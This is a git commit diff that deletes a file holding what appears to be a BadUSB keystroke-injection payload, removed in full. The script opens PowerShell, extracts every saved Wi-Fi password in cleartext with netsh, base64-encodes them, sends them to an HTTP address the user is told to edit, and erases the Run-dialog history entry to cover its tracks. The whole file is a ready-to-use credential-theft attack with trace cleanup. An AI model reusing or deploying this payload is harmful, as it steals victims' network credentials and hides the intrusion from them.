Delete Exfill-Wifi-Pwd-Win10.txt

2023-06-02 15:36:44 +02:00
parent 9a91698a5e
commit db99afb4c5
1 changed files with 0 additions and 29 deletions
@@ -1,29 +0,0 @@
-REM                                                                    _..._       .-'''-.                 .-'''-.
-REM                                                                 .-'_..._''.   '   _    \  .---.       '   _    \
-REM /|                                                            .' .'      '.\/   /` '.   \ |   |.--. /   /` '.   \
-REM ||    .-.          .-                                        / .'          .   |     \  ' |   ||__|.   |     \  '
-REM ||     \ \        / /                               .-,.--. . '            |   '      |  '|   |.--.|   '      |  '
-REM ||  __  \ \      / /                          __    |  .-. || |            \    \     / / |   ||  |\    \     / /
-REM ||/'__ '.\ \    / /            .--------.  .:--.'.  | |  | || |             `.   ` ..' /  |   ||  | `.   ` ..' /
-REM |:/`  '. '\ \  / /             |____    | / |   \ | | |  | |. '                '-...-'`   |   ||  |    '-...-'`
-REM ||     | | \ `  /                  /   /  `" __ | | | |  '-  \ '.          .              |   ||  |
-REM ||\    / '  \  /                 .'   /    .'.''| | | |       '. `._____.-'/              |   ||__|
-REM |/\'..' /   / /                 /    /___ / /   | |_| |         `-.______ /               '---'
-REM '  `'-'`|`-' /                 |         |\ \._,\ '/|_|                  `
-REM          '..'                  |_________| `--'  `"
-
-REM Steals wifi passwords (uptil win10, win11 needs admin for all passwords)
-REM Exfills it via http://127.0.0.1 (edit this)
-REM Cleans up last opened MRU listing ("powershell")
-REM Press button to close MS Edge.
-
-DELAY 1000
-GUI r
-DELAY 500
-STRING powershell
-ENTER
-DELAY 1000
-ALTCODE $base64output=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(((netsh wlan show profiles|Select-String "All User Profile\s+:\s+(.+)$"|ForEach-Object{$_.Matches.Groups[1].Value})|ForEach-Object{ "Wifi:     $_`r`n";netsh wlan show profile name=$_ key=clear|Select-String "Key Content\s+:\s+(.+)$"|ForEach-Object{"Password: $($_.Matches.Groups[1].Value)`r`n"}})-join ""));Start-Process "microsoft-edge:http://127.0.0.1?secret=$base64output";$HKCU = [Microsoft.Win32.Registry]::CurrentUser; $RunMRU = 'Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'; $RunMRUKey = $HKCU.OpenSubKey($RunMRU, $true); if ($RunMRUKey -ne $null) { $values = $RunMRUKey.GetValueNames(); if ($values.Length -gt 0) { $lastValue = $values[$values.Length - 1]; $RunMRUKey.DeleteValue($lastValue)}}
-ENTER
-WAIT_FOR_BUTTON_PRESS
-ALT F4